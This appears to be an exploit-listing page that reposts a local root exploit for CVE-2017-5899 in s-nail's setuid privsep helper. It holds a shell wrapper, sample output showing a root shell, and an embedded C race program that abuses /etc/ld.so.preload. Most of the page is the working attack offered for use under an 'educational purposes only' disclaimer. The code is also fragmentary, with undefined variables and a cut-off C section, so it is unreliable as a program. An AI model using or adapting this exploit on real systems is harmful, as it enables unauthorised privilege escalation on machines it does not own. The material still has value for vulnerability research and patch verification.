Snail < 14.8.16 local privilege escalation Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-01-13 |
Type : local |
Platform : multiple
This exploit / vulnerability Snail < 14.8.16 local privilege escalation is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/bin/sh
# Wrapper for @wapiflapi's s-nail-privget.c local root exploit for CVE-2017-5899
# uses ld.so.preload technique
# ---
# [~] Found privsep: /usr/lib/s-nail/s-nail-privsep
# [.] Compiling /var/tmp/.snail.so.c ...
# [.] Compiling /var/tmp/.sh.c ...
# [.] Compiling /var/tmp/.privget.c ...
# [.] Adding /var/tmp/.snail.so to /etc/ld.so.preload ...
# [=] s-nail-privsep local root by @wapiflapi
# [.] Started flood in /etc/ld.so.preload
# [.] Started race with /usr/lib/s-nail/s-nail-privsep
# [.] This could take a while...
# [.] Race #1 of 1000 ...
# This is a helper program of "s-nail" (in /usr/bin).
# It is capable of gaining more privileges than "s-nail"
# and will be used to create lock files.
# It's sole purpose is outsourcing of high privileges into
# fewest lines of code in order to reduce attack surface.
# It cannot be run by itself.
# [.] Race #2 of 1000 ...
# ...
# ...
# ...
# [.] Race #9 of 1000 ...
# [+] got root! /var/tmp/.sh (uid=0 gid=0)
# [.] Cleaning up...
# [+] Success:
# -rwsr-xr-x 1 root root 6336 Jan 13 20:42 /var/tmp/.sh
# [.] Launching root shell: /var/tmp/.sh
# # id
# uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),1000(test)
# ---
# <bcoles@gmail.com>
# https://github.com/bcoles/local-exploits/tree/master/CVE-2017-5899
if test -u "${1}"; then
privsep_path="${1}"
elif test -u /usr/lib/s-nail/s-nail-privsep; then
privsep_path="/usr/lib/s-nail/s-nail-privsep"
elif test -u /usr/lib/mail-privsep; then
privsep_path="/usr/lib/mail-privsep"
else
echo "[-] Could not find privsep path"
exit 1
fi
echo "[~] Found privsep: ${privsep_path}"
if ! test -w "${base_dir}"; then
echo "[-] ${base_dir} is not writable"
exit 1
fi
if ! gcc "${rootshell}.c" -fPIC -Wall -s -o "${rootshell}"; then
echo "[-] Compiling ${rootshell}.c failed"
exit 1
fi
/bin/rm "${rootshell}.c"
cat << EOF > "${privget}.c"
/*
** 26/01/2016: s-nail-privsep local root by @wapiflapi
** The setuid s-nail-privsep binary has a directory traversal bug.
** This lets us be owner of a file at any location root can give us one,
** only for a very short time though. So we have to race a bit :-)
** Here we abuse the vuln by creating a polkit policy letting us call pkexec su.
**
** gcc s-nail-privget.c -o s-nail-privget
**
** # for ubuntu:
** ./s-nail-privget /usr/lib/s-nail/s-nail-privsep
** # for archlinux:
** ./s-nail-privget /usr/lib/mail-privsep
** ---
** Original exploit: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
** Updated by <bcoles@gmail.com> to use ldpreload technique
** https://github.com/bcoles/local-exploits/tree/master/CVE-2017-5899
*/
// OK, done setting up the environment & args.
// Setup some pipes and let's get going.
if (pipe(inpipe) < 0 || pipe(outpipe) < 0) {
dprintf("[-] pipe() failed\n");
exit(EXIT_FAILURE);
}
close(inpipe[1]);
close(outpipe[0]);
while (1) {
if ((pid = fork()) < 0) {
dprintf("[!] fork failed\n");
continue;
} else if (pid) {
waitpid(pid, NULL, 0);
continue;
}
// This is the child, give it the pipes it wants. (-_-')
if (dup2(inpipe[0], 0) < 0 || dup2(outpipe[1], 1) < 0) {
dprintf("[-] dup2() failed\n");
exit(EXIT_FAILURE);
}
if (nice(20) < 0) {
dprintf("[!] Failed to set niceness");
}
dprintf("[.] Started race with %s\n", privsep_path);
dprintf("[.] This could take a while...\n");
for (int i = 1; i <= ITERATIONS; i++) {
dprintf("[.] Race #%d of %d ...\n", i, ITERATIONS);
system(privsep_path);
lstat(ROOTSHELL, &st);
if ((long)st.st_uid == 0)
break;
}